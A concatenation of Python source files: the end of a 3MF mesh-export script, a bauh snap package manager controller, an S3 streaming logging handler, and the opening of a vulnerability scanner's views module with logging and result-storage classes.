self._self_v_2 = key[2]
return True
elif type(key[0]) is not int and \
type(key[1]) is not int and \
type(key[2]) is not int:
# if iterable content is not Vertex and not int objects then try to construct Vertex(s)
try:
self._self_v_0 = Vertex(key[0])
self._self_v_1 = Vertex(key[1])
self._self_v_2 = Vertex(key[2])
key[0].parent_triangle = self
key[1].parent_triangle = self
key[2].parent_triangle = self
except:
pass
return True
else:
self._self_v_0 = key[0]
self._self_v_1 = key[1]
self._self_v_2 = key[2]
return True
else:
raise IndexError("Expected exactly 3 objects")
raise TypeError("Unexpected key type")
def _parent_mesh(self, key=None):
"""
This is how Triangle treats objects passed in the context of 'parent' concept
"""
if key is None:
# is key is none just return self parent
return self._self_parent_mesh
if type(key) is TriangleMesh:
# if key is type Triangle then assign it as self parent
self._self_parent_mesh = key
class TriangleMesh:
"""
This is a container class for Triangles
"""
def __init__(self, key=None):
self.triangles = self._triangles # Evaluate key in triangle context
self._self_triangles = [] # Actual triangles
# Try passing the key to self._vertices
try:
evaluated = self._triangles(key)
except Exception as e:
print(self, e)
raise e
else:
pass
# # no easy tool at hand to still recognize exception here
def _triangles(self, key=None):
"""
This is how Vertex treats objects passed in the context of 'parent' concept
"""
if key is None:
return self._self_triangles
if type(key) is Triangle:
# if key is Triangle add it to own triangles
self._self_triangles.append(key)
return True
# if key is iterable try adding elements as Triangles
key_len = None
try:
key_len = len(key)
except Exception as e:
# print(e)
pass
if type(key_len) is int:
for k in key:
if type(k) is Triangle:
self._self_triangles.append(k)
return True
return False
class Xml3mfWriter:
""" this class is designed to format global vertices and triangels list from LightVoxelBox object """
""" and put them into the actual 3mf file and package """
def __init__(self, triangle_mesh: TriangleMesh):
self.triangle_mesh = triangle_mesh
self.xml_root = None # :ET.Element
self.xml_vertices = None # :ET.Element
self.xml_triangles = None # :ET.Element
self._debug = False
def mesh_to_xml(self):
self.create_3mf_structure()
global_vertex_number = 0
triangles = self.triangle_mesh.triangles()
for t in triangles:
# print(t)
vertices = t.vertices()
# for every vertex in triangle try appending to file and numbering it
for v in vertices:
# print(' ', v.coordinates())
# get every Vertex in every Triangle
# if Vertex has sequence number assigned then pass
if v.sequence_number is not None:
continue
# #if vertex has no sequence number - generate it, add vertex to file
# assign current gvl and increase it by one
v.sequence_number = global_vertex_number
global_vertex_number += 1
# add to xml structure
# elements will be printed to file in the same order,
# so adding them and numbering here at the same time keeps coherence
new_vert = ET.SubElement(self.xml_vertices, 'vertex' )
coord = v.coordinates()
new_vert.attrib['x'] = str(coord[0])
new_vert.attrib['y'] = str(coord[1])
new_vert.attrib['z'] = str(coord[2])
# print(str(new_vert))
# now get the triangle itself and append to file
new_tria = ET.SubElement(self.xml_triangles, 'triangle')
new_tria.attrib['v1'] = str(vertices[0].sequence_number)
new_tria.attrib['v2'] = str(vertices[1].sequence_number)
new_tria.attrib['v3'] = str(vertices[2].sequence_number)
def create_3mf_structure(self):
""" Create basic structure of 3mf file (without actual vertices and triangles) """
# main xml element - "model". XML Root element.
self.xml_root = ET.Element('model')
self.xml_root.attrib['unit'] = 'millimeter'
# # 3mf "resources" element:
# xml element - "model" -> "resources"
mf_resources = ET.SubElement(self.xml_root, 'resources')
# xml element - "model" -> "resources" -> "object"
mf_object = ET.SubElement(mf_resources, 'object')
mf_object.attrib['type'] = 'model'
mf_object.attrib['id'] = '1'
# xml element - "model" -> "resources" -> "object" -> "mesh"
# this will contain ACTUAL 3d object data: vertices and triangles
mf_mesh = ET.SubElement(mf_object, 'mesh')
# xml element - "model" -> "resources" -> "object" -> "mesh" -> "vertices"
self.xml_vertices = ET.SubElement(mf_mesh, 'vertices')
# xml element - "model" -> "resources" -> "object" -> "mesh" -> "triangles"
self.xml_triangles = ET.SubElement(mf_mesh, 'triangles')
# xml element - "model" -> "resources" -> "object"
mf_object = ET.SubElement(mf_resources, 'object')
mf_object.attrib['type'] = 'model'
mf_object.attrib['id'] = '2'
# xml element - "model" -> "resources" -> "object" -> "mesh" -> "components"
mf_components = ET.SubElement(mf_object, 'components')
# # create more components (copy of object) and translate them
mf_component = ET.SubElement(mf_components, 'component')
mf_component.attrib['objectid'] = '1'
# # 3mf "build" element:
# xml element - "model" -> "build": this will reference just a single 3D based on "resources"
mf_build = ET.SubElement(self.xml_root, 'build')
# xml element - "model" -> "build" -> "item"
mf_item = ET.SubElement(mf_build, 'item')
mf_item.attrib['objectid'] = '2'
if self._debug:
print('Basic xml structure of 3mf file created.')
def save_3mf(self):
""" Save complete 3mf xml structure to a file and make it a legit 3mf package """
# create folder named "3D"
try:
os.mkdir('ZIP')
os.mkdir('ZIP/3D')
except FileExistsError:
pass
# make xml pretty and save xml file as "[name].model"
xmlstr = minidom.parseString(ET.tostring(self.xml_root)).toprettyxml(indent=" ")
with open("ZIP/3D/mymesh.model", "w") as f:
f.write(xmlstr)
# compress "3D" folder to a zip file
shutil.make_archive('mymesh', 'zip', 'ZIP')
# delete previous 3mf file is exists
if os.path.isfile('mymesh.3mf'):
os.remove('mymesh.3mf')
# change file extension from 'zip' to '3mf'
try:
os.rename('mymesh.zip', 'mymesh.3mf')
except FileExistsError as e:
print(str(e))
if self._debug:
print('3mf package created.')
class TriangleMeshBuilder:
"""
This class describes an object that connects abstract points in space with Triangel objects
while making sure that no Vertex object is unnecessary duplicated.
Basicaly it will hold a 3d array of Vertex objects
It can return a Vertexe at given coordinates
it can abstract Triangle construction
methods:
add vertex
if there is a Vertex at given point then return it
if there is no Vertex then create it and then return it
add triangle
check if all required vertices are existing, if not add necessary
construct Triangle object
For the TriangleMeshBuilder you can provide a list of points in the form of [p_1, p_2, p_3, ...]
where p_n is [x, y, z]
it can eventually be used to save 3mf file
it will take care of
- creating a list of UNIQIE points (because every point WILL belong to more than one triangle)
- putting them in unique order into a file
- describing triangles using this ordering information i terms of defining vertices of the triangles
"""
def __init__(self, key=None):
self.triangle_mesh = TriangleMesh()
self.triangle = self._triangle # add a triangle with given [[x0, y0, z0], [x1, y1, z1], [x2, y2, z2]]
self.writer = Xml3mfWriter(self.triangle_mesh)
self.mesh_to_xml = self._mesh_to_xml
self.save_3mf = self._save_3mf
self._3d_space = None
self._vertex = self.__vertex # add or return vertex at given [x, y, z]
# require key to be in format [x, y, z] - space dimensions
# TODO: recongnize and valuate the key instead of just accepting it as 'size'
self.size = key
# prepare the 3d space - it can actually take significant amount of time to just construct the array
self._init_3d_space()
def _init_3d_space(self):
# This array is created so that the addressing is _3d_space[x][y][z]
self._3d_space = \
[[[None for z in range(self.size[2])] for y in range(self.size[1])] for x in range(self.size[0])]
def __vertex(self, key: [] = None):
"""
if there is a Vertex at given point then return it
if there is no Vertex then create it and then return it
Input argument should be [x, y, z]
"""
# return Vertex at given coordinates, if there is any
this_vertex = self._3d_space[key[0]][key[1]][key[2]]
# print(key[0],key[1],key[2])
if this_vertex is not None:
return this_vertex
# if there is None hten create it and then return it
coords = [key[0], key[1], key[2]]
# print('new vertex coords:', coords)
this_vertex = Vertex(coords)
self._3d_space[key[0]][key[1]][key[2]] = this_vertex
return this_vertex
def _triangle(self, key: [] = None):
"""
check if all required vertices are existing, if not add necessary
construct Triangle object
Input argument should be [[x0, y0, z0], [x1, y1, z1], [x2, y2, z2]]
"""
# extract 3 disctinct points
v0_coords = key[0]
v1_coords = key[1]
v2_coords = key[2]
# get Vertex objects via own method
v0 = self.__vertex(v0_coords)
v1 = self.__vertex(v1_coords)
v2 = self.__vertex(v2_coords)
# construct a Triangle and return it
t = Triangle([v0, v1, v2])
self.triangle_mesh.triangles(t)
return t
def _mesh_to_xml(self):
self.writer.mesh_to_xml()
def _save_3mf(self):
self.writer.save_3mf()
triangles = [
[
[0, 0, 0], [10, 0, 0], [5, 5, 0]
],
[
[0, 0, 0], [5, 5, 0], [2, 2, 20]
],
[
[2, 2, 20], [5, 5, 0], [10, 0, 0]
],
[
[0, 0, 0], [2, 2, 20], [10, 0, 0]
]
]
[x, y, z] = [400, 400, 100]
# generate random triangels
t0 = time.perf_counter()
rand = random.random
for n in range(100_000):
triangles.append([
[int(rand()*x), int(rand()*y), int(rand()*z)],
[int(rand()*x), int(rand()*y), int(rand()*z)],
[int(rand()*x), int(rand()*y), int(rand()*z)]
])
t0 = time.perf_counter() - t0
# create mesh builder object
t1 = time.perf_counter()
tmb = TriangleMeshBuilder([x, y, z])
t1 = time.perf_counter() - t1
# give all triangles to the mesh builder
t2 = time.perf_counter()
for t in triangles:
tmb.triangle(t)
t2 = time.perf_counter() - t2
# build xml structure
t3 = time.perf_counter()
tmb.mesh_to_xml()
t3 = time.perf_counter() - t3
# save 3mf file
t4 = time.perf_counter()
tmb.save_3mf()
t4 = time.perf_counter() - t4
# speed = None
# def demon():
# global speed
# while(1):
# t1 = time.perf_counter()
# for t in triangles:
# tmb.triangle(t)
# tmb.mesh_to_xml()
# speed = time.perf_counter() - t1
# x = threading.Thread(target=demon, args=(1,), daemon=True)
# T = threading.Thread(target=demon)
# # set thread as Daemon
# T.setDaemon(True)
# T.start()
# """ SELF TEST """
# if __name__ == "__main__":
# # if loaded as __main__ run self test
# subprocess.call(["python", "LightPicture_Test.py"])
|
controller.py | import re
import time
from datetime import datetime
from threading import Thread
from typing import List, Set, Type
from bauh.api.abstract.controller import SoftwareManager, SearchResult, ApplicationContext
from bauh.api.abstract.disk import DiskCacheLoader
from bauh.api.abstract.handler import ProcessWatcher
from bauh.api.abstract.model import SoftwarePackage, PackageHistory, PackageUpdate, PackageSuggestion, \
SuggestionPriority
from bauh.api.abstract.view import SingleSelectComponent, SelectViewType, InputOption
from bauh.commons.category import CategoriesDownloader
from bauh.commons.html import bold
from bauh.commons.system import SystemProcess, ProcessHandler, new_root_subprocess
from bauh.gems.snap import snap, URL_CATEGORIES_FILE, SNAP_CACHE_PATH, CATEGORIES_FILE_PATH, SUGGESTIONS_FILE
from bauh.gems.snap.constants import SNAP_API_URL
from bauh.gems.snap.model import SnapApplication
from bauh.gems.snap.worker import SnapAsyncDataLoader
RE_AVAILABLE_CHANNELS = re.compile(re.compile(r'(\w+)\s+(snap install.+)'))
class SnapManager(SoftwareManager):
def __init__(self, context: ApplicationContext):
super(SnapManager, self).__init__(context=context)
self.i18n = context.i18n
self.api_cache = context.cache_factory.new()
context.disk_loader_factory.map(SnapApplication, self.api_cache)
self.enabled = True
self.http_client = context.http_client
self.logger = context.logger
self.ubuntu_distro = context.distro == 'ubuntu'
self.categories = {}
self.categories_downloader = CategoriesDownloader('snap', self.http_client, self.logger, self, context.disk_cache,
URL_CATEGORIES_FILE, SNAP_CACHE_PATH, CATEGORIES_FILE_PATH)
self.suggestions_cache = context.cache_factory.new()
self.info_path = None
def get_info_path(self) -> str:
if self.info_path is None:
self.info_path = snap.get_app_info_path()
return self.info_path
def map_json(self, app_json: dict, installed: bool, disk_loader: DiskCacheLoader, internet: bool = True) -> SnapApplication:
app = SnapApplication(publisher=app_json.get('publisher'),
rev=app_json.get('rev'),
notes=app_json.get('notes'),
has_apps_field=app_json.get('apps_field', False),
id=app_json.get('name'),
name=app_json.get('name'),
version=app_json.get('version'),
latest_version=app_json.get('version'),
description=app_json.get('description', app_json.get('summary')),
verified_publisher=app_json.get('developer_validation', '') == 'verified')
if app.publisher and app.publisher.endswith('*'):
app.verified_publisher = True
app.publisher = app.publisher.replace('*', '')
categories = self.categories.get(app.name.lower())
if categories:
app.categories = categories
app.installed = installed
if not app.is_application():
categories = app.categories
if categories is None:
categories = []
app.categories = categories
if 'runtime' not in categories:
categories.append('runtime')
api_data = self.api_cache.get(app_json['name'])
expired_data = api_data and api_data.get('expires_at') and api_data['expires_at'] <= datetime.utcnow()
if (not api_data or expired_data) and app.is_application():
if disk_loader and app.installed:
disk_loader.fill(app)
if internet:
SnapAsyncDataLoader(app=app, api_cache=self.api_cache, manager=self, context=self.context).start()
else:
app.fill_cached_data(api_data)
return app
def search(self, words: str, disk_loader: DiskCacheLoader, limit: int = -1, is_url: bool = False) -> SearchResult:
if is_url:
return SearchResult([], [], 0)
if snap.is_snapd_running():
installed = self.read_installed(disk_loader).installed
res = SearchResult([], [], 0)
for app_json in snap.search(words):
already_installed = None
if installed:
already_installed = [i for i in installed if i.id == app_json.get('name')]
already_installed = already_installed[0] if already_installed else None
if already_installed:
res.installed.append(already_installed)
else:
res.new.append(self.map_json(app_json, installed=False, disk_loader=disk_loader))
res.total = len(res.installed) + len(res.new)
return res
else:
return SearchResult([], [], 0)
def read_installed(self, disk_loader: DiskCacheLoader, limit: int = -1, only_apps: bool = False, pkg_types: Set[Type[SoftwarePackage]] = None, internet_available: bool = None) -> SearchResult:
info_path = self.get_info_path()
if snap.is_snapd_running() and info_path:
self.categories_downloader.join()
installed = [self.map_json(app_json, installed=True, disk_loader=disk_loader, internet=internet_available) for app_json in snap.read_installed(info_path)]
return SearchResult(installed, None, len(installed))
else:
return SearchResult([], None, 0)
def downgrade(self, pkg: SnapApplication, root_password: str, watcher: ProcessWatcher) -> bool:
return ProcessHandler(watcher).handle(SystemProcess(subproc=snap.downgrade_and_stream(pkg.name, root_password), wrong_error_phrase=None))
def update(self, pkg: SnapApplication, root_password: str, watcher: ProcessWatcher) -> SystemProcess:
raise Exception("'update' is not supported by {}".format(pkg.__class__.__name__))
def uninstall(self, pkg: SnapApplication, root_password: str, watcher: ProcessWatcher) -> bool:
uninstalled = ProcessHandler(watcher).handle(SystemProcess(subproc=snap.uninstall_and_stream(pkg.name, root_password)))
if self.suggestions_cache:
self.suggestions_cache.delete(pkg.name)
return uninstalled
def get_managed_types(self) -> Set[Type[SoftwarePackage]]:
return {SnapApplication}
def clean_cache_for(self, pkg: SnapApplication):
super(SnapManager, self).clean_cache_for(pkg)
self.api_cache.delete(pkg.id)
def get_info(self, pkg: SnapApplication) -> dict:
info = snap.get_info(pkg.name, attrs=('license', 'contact', 'commands', 'snap-id', 'tracking', 'installed'))
info['description'] = pkg.description
info['publisher'] = pkg.publisher
info['revision'] = pkg.rev
info['name'] = pkg.name
if info.get('commands'):
info['commands'] = ' '.join(info['commands'])
if info.get('license') and info['license'] == 'unset':
del info['license']
return info
def get_history(self, pkg: SnapApplication) -> PackageHistory:
raise Exception("'get_history' is not supported by {}".format(pkg.__class__.__name__))
def install(self, pkg: SnapApplication, root_password: str, watcher: ProcessWatcher) -> bool:
info_path = self.get_info_path()
if not info_path:
self.logger.warning('Information directory was not found. It will not be possible to determine if the installed application can be launched')
res, output = ProcessHandler(watcher).handle_simple(snap.install_and_stream(pkg.name, pkg.confinement, root_password))
if 'error:' in output:
res = False
if 'not available on stable' in output:
channels = RE_AVAILABLE_CHANNELS.findall(output)
if channels:
opts = [InputOption(label=c[0], value=c[1]) for c in channels]
channel_select = SingleSelectComponent(type_=SelectViewType.RADIO, label='', options=opts, default_option=opts[0])
body = '<p>{}.</p>'.format(self.i18n['snap.install.available_channels.message'].format(bold(self.i18n['stable']), bold(pkg.name)))
body += '<p>{}:</p>'.format(self.i18n['snap.install.available_channels.help'])
if watcher.request_confirmation(title=self.i18n['snap.install.available_channels.title'],
body=body,
components=[channel_select],
confirmation_label=self.i18n['continue'],
deny_label=self.i18n['cancel']):
self.logger.info("Installing '{}' with the custom command '{}'".format(pkg.name, channel_select.value))
res = ProcessHandler(watcher).handle(SystemProcess(new_root_subprocess(channel_select.value.value.split(' '), root_password=root_password)))
if res and info_path:
pkg.has_apps_field = snap.has_apps_field(pkg.name, info_path)
return res
else:
self.logger.error("Could not find available channels in the installation output: {}".format(output))
else:
if info_path:
pkg.has_apps_field = snap.has_apps_field(pkg.name, info_path)
return res
def is_enabled(self) -> bool:
return self.enabled
def set_enabled(self, enabled: bool):
self.enabled = enabled
def can_work(self) -> bool:
return snap.is_installed()
def requires_root(self, action: str, pkg: SnapApplication):
return action != 'search'
def refresh(self, pkg: SnapApplication, root_password: str, watcher: ProcessWatcher) -> bool:
return ProcessHandler(watcher).handle(SystemProcess(subproc=snap.refresh_and_stream(pkg.name, root_password)))
def prepare(self):
self.categories_downloader.start()
def list_updates(self, internet_available: bool) -> List[PackageUpdate]:
pass
def list_warnings(self, internet_available: bool) -> List[str]:
if snap.is_installed():
if not snap.is_snapd_running():
snap_bold = bold('Snap')
return [self.i18n['snap.notification.snapd_unavailable'].format(bold('snapd'), snap_bold),
self.i18n['snap.notification.snap.disable'].format(snap_bold, bold('{} > {}'.format(self.i18n['settings'].capitalize(),
self.i18n['core.config.tab.types'])))]
elif internet_available:
available, output = snap.is_api_available()
if not available:
self.logger.warning('It seems Snap API is not available. Search output: {}'.format(output))
return [self.i18n['snap.notifications.api.unavailable'].format(bold('Snaps'), bold('Snap'))]
def _fill_suggestion(self, pkg_name: str, priority: SuggestionPriority, out: List[PackageSuggestion]):
res = self.http_client.get_json(SNAP_API_URL + '/search?q=package_name:{}'.format(pkg_name))
if res and res['_embedded']['clickindex:package']:
pkg = res['_embedded']['clickindex:package'][0]
pkg['rev'] = pkg['revision']
pkg['name'] = pkg_name
sug = PackageSuggestion(self.map_json(pkg, installed=False, disk_loader=None), priority)
self.suggestions_cache.add(pkg_name, sug)
out.append(sug)
else:
self.logger.warning("Could not retrieve suggestion '{}'".format(pkg_name))
def list_suggestions(self, limit: int, filter_installed: bool) -> List[PackageSuggestion]:
res = []
if snap.is_snapd_running():
self.logger.info('Downloading suggestions file {}'.format(SUGGESTIONS_FILE))
file = self.http_client.get(SUGGESTIONS_FILE)
if not file or not file.text:
self.logger.warning("No suggestion found in {}".format(SUGGESTIONS_FILE))
return res
else:
self.logger.info('Mapping suggestions')
self.categories_downloader.join()
suggestions, threads = [], []
installed = {i.name.lower() for i in self.read_installed(disk_loader=None).installed} if filter_installed else None
for l in file.text.split('\n'):
if l:
if limit <= 0 or len(suggestions) < limit:
sug = l.strip().split('=')
name = sug[1]
if not installed or name not in installed:
cached_sug = self.suggestions_cache.get(name)
if cached_sug:
res.append(cached_sug)
else:
t = Thread(target=self._fill_suggestion, args=(name, SuggestionPriority(int(sug[0])), res))
t.start()
threads.append(t)
time.sleep(0.001) # to avoid being blocked
else:
break
for t in threads:
t.join()
res.sort(key=lambda s: s.priority.value, reverse=True)
return res
def is_default_enabled(self) -> bool:
return True
def launch(self, pkg: SnapApplication):
snap.run(pkg, self.context.logger)
def get_screenshots(self, pkg: SoftwarePackage) -> List[str]:
res = self.http_client.get_json('{}/search?q={}'.format(SNAP_API_URL, pkg.name))
if res:
if res.get('_embedded') and res['_embedded'].get('clickindex:package'):
snap_data = res['_embedded']['clickindex:package'][0]
if snap_data.get('screenshot_urls'):
return snap_data['screenshot_urls']
else:
self.logger.warning("No 'screenshots_urls' defined for {}".format(pkg))
else:
self.logger.error('It seems the API is returning a different response: {}'.format(res))
else:
self.logger.warning('Could not retrieve data for {}'.format(pkg))
return []
|
__init__.py | """
S3 Binding Module with logging handler and stream object
"""
__author__ = 'Omri Eival'
import atexit
import signal
import threading
import queue
import gzip
import codecs
import os
from logging import StreamHandler
from io import BufferedIOBase, BytesIO
from boto3 import Session
import datetime
from aws_logging_handlers.validation import is_non_empty_string, is_positive_int, empty_str_err, bad_integer_err, ValidationRule
from aws_logging_handlers.tasks import Task, task_worker, STOP_SIGNAL
DEFAULT_CHUNK_SIZE = 5 * 1024 ** 2 # 5 MB
DEFAULT_ROTATION_TIME_SECS = 12 * 60 * 60 # 12 hours
MAX_FILE_SIZE_BYTES = 100 * 1024 ** 2 # 100 MB
MIN_WORKERS_NUM = 1
TZ_INFO = datetime.timezone(datetime.timedelta(hours=9)) # KOREA SEOUL TIME
class StreamObject:
"""
Class representation of the AWS s3 object along with all the needed metadata to stream to s3
"""
def __init__(self, s3_resource, bucket_name, filename, buffer_queue, encryption):
self.object = s3_resource.Object(bucket_name, filename)
self.uploader = self.object.initiate_multipart_upload(**encryption)
self.bucket = bucket_name
try:
total_bytes = s3_resource.meta.client.head_object(Bucket=self.bucket.name, Key=filename)
except Exception:
total_bytes = 0
self.buffer = BytesIO()
self.chunk_count = 0
self.byte_count = total_bytes
self.parts = []
self.tasks = buffer_queue
def add_task(self, task):
"""
Add a task to the tasks queue
:param task: Task object
:return:
"""
self.tasks.put(task)
def join_tasks(self):
"""
Join all the tasks
:return:
"""
self.tasks.join()
class S3Stream(BufferedIOBase):
"""
stream interface used by the handler
"""
def __init__(self, bucket: str, key: str, *, chunk_size: int = DEFAULT_CHUNK_SIZE,
max_file_log_time: int = DEFAULT_ROTATION_TIME_SECS, max_file_size_bytes: int = MAX_FILE_SIZE_BYTES,
encoder: str = 'utf-8', workers: int = 1, compress: bool = False, log_root: str = '', encryption_options: dict = None, **boto_session_kwargs):
"""
:param bucket: name of the s3 bucket
:type bucket: str
:param key: s3 key path
:type key: str
:param chunk_size: size of multipart upload chunk size (default 5MB)
:type chunk_size: int
:param max_file_log_time: threshold period for a log period until file rotation (default 12 Hours)
:type max_file_log_time: int
:param max_file_size_bytes: threshold for file rotation by bytes (default 100MB)
:type max_file_size_bytes: int
:param encoder: the encoder to be used for log records (default 'utf-8')
:type encoder: str
:param workers: the number of background workers that rotate log records (default 1)
:type workers: int
:param compress: flag indication for archiving the content of a file
:type compress: bool
:param boto_session_kwargs: additional keyword arguments for the AWS Kinesis Resource
:type boto_session_kwargs: boto3 resource keyword arguments
"""
self._stream_buffer_queue = queue.Queue()
self._rotation_queue = queue.Queue()
self._session = Session()
self.s3 = self._session.resource('s3', **boto_session_kwargs)
self.start_time = datetime.datetime.now(tz=TZ_INFO)
self.key = key
self.chunk_size = chunk_size
self.max_file_log_time = max_file_log_time
self.max_file_size_bytes = max_file_size_bytes
self.current_file_name = os.path.join(log_root, "{}_{}".format(key, self.datetime_to_str(datetime.datetime.now(tz=TZ_INFO))))
self.log_root = log_root
self.encryption_options = encryption_options if encryption_options else {}
if compress:
self.current_file_name = "{}.gz".format(self.current_file_name)
else:
self.current_file_name = "{}.log".format(self.current_file_name)
self.encoder = encoder
self.bucket = bucket
self._current_object = self._get_stream_object(self.current_file_name)
self.workers = [threading.Thread(target=task_worker, args=(self._rotation_queue,), daemon=True).start() for _ in
range(int(max(workers, MIN_WORKERS_NUM) / 2) + 1)]
self._stream_bg_workers = [threading.Thread(target=task_worker, args=(self._stream_buffer_queue,), daemon=True).start() for _
in range(max(int(max(workers, MIN_WORKERS_NUM) / 2), 1))]
self._is_open = True
self.compress = compress
BufferedIOBase.__init__(self)
@property
def bucket(self):
return self._bucket
@bucket.setter
def bucket(self, val):
if not val:
raise ValueError("Bucket name is invalid")
try:
self.s3.meta.client.head_bucket(Bucket=val)
except Exception:
raise ValueError('Bucket %s does not exist, or insufficient permissions' % val)
self._bucket = self.s3.Bucket(val)
@property
def key(self):
return self._key
@key.setter
def key(self, val):
if not val:
raise ValueError("Given key is invalid")
self._key = val.strip('/')
@property
def encoder(self):
return self._encoder
@encoder.setter
def encoder(self, val):
_ = codecs.getencoder(val)
self._encoder = val
@staticmethod
def datetime_to_str(date):
return date.strftime('%Y-%m-%d_%H:%M:%S')
@staticmethod
def datetime_timediff(date1, date2):
diff = (date1 - date2).total_seconds()
diff = (-1 * diff) if (diff < 0) else diff
return diff
def get_filename(self):
"""
returns a log file name
:return: name of the log file in s3
"""
filename = os.path.join(self.log_root, "{}_{}".format(self.key, self.datetime_to_str(self.start_time)))
if not self.compress:
return "{}.log".format(filename)
return "{}.gz".format(filename)
def _add_task(self, task):
self._rotation_queue.put(task)
def _join_tasks(self):
self._rotation_queue.join()
def _get_stream_object(self, filename):
try:
return StreamObject(self.s3, self.bucket.name, filename, self._stream_buffer_queue, self.encryption_options)
except Exception:
raise RuntimeError('Failed to open new S3 stream object')
def _rotate_chunk(self, run_async=True):
assert self._current_object, "Stream object not found"
part_num = self._current_object.chunk_count + 1
part = self._current_object.uploader.Part(part_num)
buffer = self._current_object.buffer
self._current_object.buffer = BytesIO()
buffer.seek(0)
if run_async:
self._current_object.add_task(Task(self._upload_part, self._current_object, part, part_num, buffer))
else:
self._upload_part(self._current_object, part, part_num, buffer)
self._current_object.chunk_count += 1
@staticmethod
def _upload_part(s3_object, part, part_num, buffer):
upload = part.upload(Body=buffer)
s3_object.parts.append({'ETag': upload['ETag'], 'PartNumber': part_num})
def _rotate_file(self):
if self._current_object.buffer.tell() > 0:
self._rotate_chunk()
temp_object = self._current_object
self._add_task(Task(self._close_stream, stream_object=temp_object))
self.start_time = datetime.datetime.now(tz=TZ_INFO)
new_filename = self.get_filename()
print ("FILENAME : {}".format(new_filename))
self._current_object = self._get_stream_object(new_filename)
@staticmethod
def _close_stream(stream_object, callback=None, *args, **kwargs):
stream_object.join_tasks()
if stream_object.chunk_count > 0:
stream_object.uploader.complete(MultipartUpload={'Parts': sorted(stream_object.parts, key=lambda p: p['PartNumber'])})
else:
stream_object.uploader.abort()
if callback and callable(callback):
callback(*args, **kwargs)
def close(self, *args, **kwargs):
"""
close the stream for writing, upload remaining log records in stream
:param args:
:param kwargs:
:return:
"""
if self._current_object.buffer.tell() > 0:
self._rotate_chunk(run_async=False)
self._current_object.join_tasks()
self._join_tasks()
self._close_stream(self._current_object)
# Stop the worker threads
for _ in range(len(self.workers)):
self._rotation_queue.put(STOP_SIGNAL)
for _ in range(len(self._stream_bg_workers)):
self._stream_buffer_queue.put(STOP_SIGNAL)
self._is_open = False
@property
def closed(self):
return not self._is_open
@property
def writable(self, *args, **kwargs):
return True
def tell(self, *args, **kwargs):
"""
indication of current size of the stream before rotation
:param args:
:param kwargs:
:return: size of the current stream
"""
return self._current_object.byte_count
def write(self, *args, **kwargs):
"""
writes a log record to the stream
:param args:
:param kwargs:
:return: size of record that was written
"""
s = self.compress and gzip.compress(args[0].encode(self.encoder)) or args[0].encode(self.encoder)
self._current_object.buffer.write(s)
self._current_object.byte_count = self._current_object.byte_count + len(s)
return len(s)
def flush(self, *args, **kwargs):
"""
flushes the current stream if it exceeds the threshold size
:return:
"""
if self._current_object.buffer.tell() > self.chunk_size:
self._rotate_chunk()
if (self.max_file_size_bytes and self._current_object.byte_count > self.max_file_size_bytes) or (
self.max_file_log_time and int(self.datetime_timediff(datetime.datetime.now(tz=TZ_INFO), self.start_time)) > self.max_file_log_time):
self._rotate_file()
class S3Handler(StreamHandler):
"""
A Logging handler class that streams log records to S3 by chunks
"""
def __init__(self, key: str, bucket: str, *, chunk_size: int = DEFAULT_CHUNK_SIZE,
time_rotation: int = DEFAULT_ROTATION_TIME_SECS, max_file_size_bytes: int = MAX_FILE_SIZE_BYTES,
encoder: str = 'utf-8',
workers: int = 1, compress: bool = False, log_root: str = '', **boto_session_kwargs):
"""
:param key: The path of the S3 object
:type key: str
:param bucket: The id of the S3 bucket
:type bucket: str
:param chunk_size: size of a chunk in the multipart upload in bytes (default 5MB)
:type chunk_size: int
:param time_rotation: Interval in seconds to rotate the file by (default 12 hours)
:type time_rotation: int
:param max_file_size_bytes: maximum file size in bytes before rotation (default 100MB)
:type max_file_size_bytes: int
:param encoder: default utf-8
:type encoder: str
:param workers: the number of workers that a stream handler would run for
file and chunk rotation tasks; only useful if emitting lots of records
:type workers: int
:param compress: indicating whether to save a compressed gz-suffixed file
:type compress: bool
"""
args_validation = (
ValidationRule(time_rotation, is_positive_int, bad_integer_err('time_rotation')),
ValidationRule(max_file_size_bytes, is_positive_int, bad_integer_err('max_file_size_bytes')),
ValidationRule(encoder, is_non_empty_string, empty_str_err('encoder')),
ValidationRule(workers, is_positive_int, bad_integer_err('workers')),
)
for rule in args_validation:
assert rule.func(rule.arg), rule.message
self.bucket = bucket
self.stream = S3Stream(self.bucket, key, chunk_size=chunk_size, max_file_log_time=time_rotation,
max_file_size_bytes=max_file_size_bytes, encoder=encoder, workers=workers,
compress=compress, log_root=log_root, **boto_session_kwargs)
# Make sure we gracefully clear the buffers and upload the missing parts before exiting
self._sigterm_handler = signal.signal(signal.SIGTERM, self._teardown)
self._sigint_handler = signal.signal(signal.SIGINT, self._teardown)
self._sigquit_handler = signal.signal(signal.SIGQUIT, self._teardown)
atexit.register(self.close)
StreamHandler.__init__(self, self.stream)
def _teardown(self, signum: int, frame):
self.close()
if signum == signal.SIGTERM:
self._sigterm_handler(signum, frame)
elif signum == signal.SIGINT:
self._sigint_handler(signum, frame)
elif signum == signal.SIGQUIT:
self._sigquit_handler(signum, frame)
def close(self, *args, **kwargs):
"""
Closes the stream
"""
self.acquire()
try:
if self.stream:
try:
self.flush()
finally:
stream = self.stream
self.stream = None
if hasattr(stream, "close"):
stream.close(*args, **kwargs)
finally:
self.release()
|
views.py | import sys
import threading
from Assets.models import AssetList
from ApolloScanner.dingtalk import dingtalker
from Configuration.models import Configuration
from VulnerableScan.models import ExploitRegister, VulnerableScanTasks, VulnerableScanResult
class MyLogger:
def __init__(self, exp_id, debug_flag):
self.exploit_id = exp_id
self.debug = debug_flag
def log(self, message):
if not self.debug:
return
print(1)
old_content = ExploitRegister.objects.filter(id=self.exploit_id).values_list("debug_info")[0][0]
print(old_content)
new_content = str(old_content) + str(message)
print(new_content)
ExploitRegister.objects.filter(id=self.exploit_id).update(debug_info=new_content)
class ResultStruts:
def __init__(self, task_id, task_name):
self.cursor = VulnerableScanResult.objects
self.result = {
"task_id": task_id,
"task_name": task_name,
"ip_address": None,
"port": None,
"result_flag": False,
}
def insert(self, address, port, result):
self.result["ip_address"] = address
self.result["port"] = int(port)
self.result["result_flag"] = result
self.cursor.create(**self.result)
class VulnerableScanner:
def __init__(self, task_id, debug=False):
self.task_name = "debug"
self.exploit_id = task_id
if not debug:
self.task_name = VulnerableScanTasks.objects.filter(id=task_id).values_list("name")[0][0]
self.exploit_id = VulnerableScanTasks.objects.filter(id=task_id).values_list("exploit")[0][0]
try:
self.max_thread_count = int(Configuration.objects.filter(name="6").values_list("count")[0][0])
except Exception as exception:
print(exception)
self.max_thread_count = 10
self.thread_size = 0
self.debug = debug
